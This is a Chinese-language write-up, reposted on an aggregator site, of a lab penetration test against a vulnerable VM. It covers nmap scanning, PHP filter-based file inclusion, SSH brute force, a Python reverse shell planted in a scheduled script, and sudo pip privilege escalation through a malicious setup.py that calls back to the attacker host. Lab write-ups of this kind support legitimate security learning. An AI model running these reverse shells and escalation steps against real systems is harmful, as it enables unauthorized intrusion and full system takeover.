我的编程空间,编程开发者的网络收藏夹
学习永远不晚

【网络安全】记一次红队渗透实战项目

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

【网络安全】记一次红队渗透实战项目

一、信息收集

信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集

1、nmap 扫描存活 IP

由于本项目环境是 nat 模式需要项目 IP 地址,扫描挖掘本地的 IP 地址信息:

本机 IP 为:192.168.40.177。

发现本 kali ip 为 40 段!用 40 段进行全网段扫描:

nmap -sP 192.168.40.0/24

Nmap scan report for localhost (192.168.40.190)

发现项目 IP 地址:192.168.40.190。

2、nmap 全端口服务枚举

进行 namp 端口服务枚举:

nmap -p- 192.168.40.19

得到开放的端口信息:

80/tcp    open  http    111/tcp   open  rpcbind3333/tcp  open  dec-notes ssh OpenSSH 6.7p1    47046/tcp open  unknown

开启了 80、111 和 3333 端口,继续探测下端口信息:

nmap 192.168.40.190 -p80,111,3333,35523 -A -T5

可以详细看到端口开启的版本信息,就从 web 页面信息枚举信息!

3、web 信息枚举

访问 web 页面:

http://192.168.40.190/

没有什么可用信息!扫描下目录枚举下信息。

4、dirb 目录扫描

dirb 扫描目录:

dirb http://192.168.40.190/

 dirb 扫出的目录都是访问空白页面!

查看主页的静态源码发现:

?lang= ,出现这种形式,很可能是 sql 注入或文件包含

访问下该目录:

http://192.168.40.190/?lang=fr

发现跳转回了主页

利用 dirb 扫描:

dirb http://192.168.40.190/?lang=

发现存在 fr 和 index

http://192.168.40.190/?lang=fr  http://192.168.40.190/?lang=index

尝试访问 fr.php 和 index.php,发现都跳转回主页!

http://192.168.40.190/?lang=fr

通过抓包分析:curl 测试是否存在文件包含响应

curl -i http://192.168.40.190/?lang=fr     curl -i http://192.168.40.190/?lang=index-i    ----include 在输出中包含协议响应头

 对比发现:

fr :HTTP/1.1 200 OKindex:HTTP/1.0 500 Internal Server Error

疑似存在文件包含,该文件底层可能存在 inclu()函数,开始测试!

三、文件包含

通过过滤器方法绕过枚举出需要读的文件信息。

PHP 存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。1)字符串过滤器:字符串过滤器就是用户输入的内容会转换为大写、小写、ROT13 字符、或者去除 php 标记等功能。2)转换过滤器:就是用户输入的数据转换为 base64 编码和解码功能,还有将字符串转换为 8-bit 字符串功能。3)压缩过滤器:zip 中有 zlib 和 bzip2 等函数协议,功能就是在用户传输中会有压缩文件做一些压缩函数转换功能。4)加密过滤器 mcrypt 是 php 里面重要的加密支持扩展库,主要是用 mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。

那么不管是哪些过滤器,都可以尝试下面六种方法去操作测试是否可以进行文件包含:

/index.php?page=/etc/passwd/index.php?page=.. /../../../../../etc/passwdindex.php?page=php://filter/read=/index.php?page=php://filter/convert.base64-encode/resource=/index.php?page=zip://page=data://

 用过滤器测试下文件包含:

curl http://192.168.40.190/?lang=php://filter/convert.base64-encode/resource=index | head -n 1 | base64 -d

获得密码:

Niamey4Ever227!!!

但是不知道是哪个用户的密码,爆破 ssh 获得用户名!

四、ssh 用户名枚举爆破

1、cewl 枚举用户名

cewl http://192.168.40.190/

2、暴力破解 ssh

利用实战常用的:gorailgun.exe

记得修改下端口 ,项目 ssh 端口为 3333

成功获得用户:mamadou

五、内部信息枚举

1、ssh 登录

ssh mamadou@192.168.40.190 -p 3333Niamey4Ever227!!!

输入进来发现这是:Python 2.7.9 的命令框

通过 python 获得 bash 正常 shell:

import pty;pty.spawn('/bin/bash');

获得正常 shell!

2、脚本信息枚举

开启 http 服务上传扫描脚本 linpeas.sh:

python -m SimpleHTTPServer 8081 wget http://192.168.40.177:8081/linpeas.sh

上传成功!

赋权并执行脚本,linpeas.sh 信息枚举:

chmod +x linpeas.sh./linpeas.sh

发现如下新信息

发现新用户是 1002,说明包含了 2 个权限uid=1001(devops) gid=1002(developer) groups=1002(developer)

root 权限 pip,PIP 是 Python 包或模块的包管理器,包含模块所需的所有文件rwxr-sr-- 1 root developer 281 Feb 27 2015 /usr/bin/pip

3、find 深入枚举

1)mamadou 用户信息枚举

利用 find 针对 mamadou 查看可运行权限文件:

/   ---反斜杠从根目录开始查询-user mamadou  ---搜索普通该用户权限的文件2>&1   ----将所有错误信息重定向不输出过滤掉-v   ---就是过滤错误的输出

发现 flag1:

cat /home/mamadou/flag1.txt

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

2)devops 用户信息枚举

通过前面脚本枚举还发现存在另一个用户:devops,也利用 find 针对 devops 查看其可运行权限文件:

find / -user devops 2>&1 | grep -v "Permission denied\|proc"

返回三个信息,具体查看下

/srv/.antivirus.py/tmp/test/home/devops/flag2.txt

这里返现三个可疑信息:

尝试打开 flag2.txt:cat /home/devops/flag2.txt

提示无权限打开!

尝试打开 antivirus.py:

cat /srv/.antivirus.py

发现这是一个可读可写的 python 脚本!

open('/tmp/test','w').write('test')

查看下 antivirus 是否存在计划任务启动该脚本:

find / -name *antivirus* 2>&1 | grep -v "Permission denied\|proc"

发现存在 antivirus.service 服务!

查看下该服务内容:

cat /lib/systemd/system/antivirus.service

提示存在该服务存在计划任务,每 5 分钟 devops 用户执行一次

RestartSec=300   ---300秒运行一次User=devops      ---这是devops用户运行

接下来利用该计划任务来编译反弹 shell!

六、计划任务反弹 shell

1、写入计划任务

本地开启 nc 端口:

nc -tvlp 9999

nano 写入反弹 shell

nano /srv/.antivirus.py写入以下shell:#!/usr/bin/pythondef con():  import socket, time,pty, os  host='192.168.40.177'  port=9999  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.settimeout(10)  s.connect((host,port))  os.dup2(s.fileno(),0)  os.dup2(s.fileno(),1)  os.dup2(s.fileno(),2)  os.putenv("HISTFILE",'/dev/null')  pty.spawn("/bin/bash")  s.close()con()

等 5 分钟成功反弹 devops 用户 shell!

七、内部信息枚举--devops

1、组信息枚举

cat /etc/group

developer1002: ---可看到还存在 group 组里的 developer

2、find 查看权限文件

利用 find 针对 developer 查看可运行权限文件:

find / -group developer 2>&1 | grep -v "Permission denied\|proc"

发现存在:/usr/bin/pip 可运行文件和 flag2

3、获取 flag

cat /home/devops/flag2.txt

Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098

在整个目录中枚举 devops:

grep -rn / -e devops 2>&1 | grep -v "Permission denied\|proc"

没发现新的东西,但是可看到 devops 的 ID 为 1002 是共用的!

/etc/subgid:11:devops:755360:65536/etc/group:56:devops:x:1001:/etc/passwd:29:devops:x:1001:1002:,,,:/home/devops:/bin/bash/etc/subuid:11:devops:755360:65536

4、sudo 提权

尝试 sudo 提权:

sudo -l

提示用户可以在/usr/bin/pip 执行 sudo

User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip

八、pip 提权

pip 可执行 sudo 提权,那就利用 pip 写入 py 脚本运行

开启 nc 反弹 shell:

nc -vlp 4455

本地添加设置脚本 setup.py:

将 host 更改为本地 kali 地址,端口随拟。

gedit setup.py写入以下py脚本:from setuptools import setupimport socket,subprocess,osdef con():  import socket, time,pty, os  host='192.168.40.177'  port=4455  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.settimeout(10)  s.connect((host,port))  os.dup2(s.fileno(),0)  os.dup2(s.fileno(),1)  os.dup2(s.fileno(),2)  os.putenv("HISTFILE",'/dev/null')  pty.spawn("/bin/bash")  s.close()con()setup(name="root", version="1.0")

配置成功!

到 tmp 目录下上传 setup.py 脚本至靶机:

cd /tmpwget http://192.168.40.177:8081/setup.py

上传成功!

sudo 运行脚本 setup.py:

sudo pip install setup.py .

成功获得反弹 shell!

获得 flag:

cd /root cat root.txt

flag:821ae63dbe0c573eff8b69d451fb21bc

提权 pip:拓展思路

poc:[https://github.com/0x00-0x00/FakePip](https://github.com/0x00-0x00/FakePip)

用代理下载 FakePip 包:

proxychains git clone https://github.com/0x00-0x00/FakePip.git

下载成功!

查看脚本机制并配置参数:

cd FakePip   cat setup.pygedit setup.py

将 lhost 改为本地 kali 地址,端口可不变:

192.168.40.17713372

来源地址:https://blog.csdn.net/yinjiyufei/article/details/129766997

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

【网络安全】记一次红队渗透实战项目

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录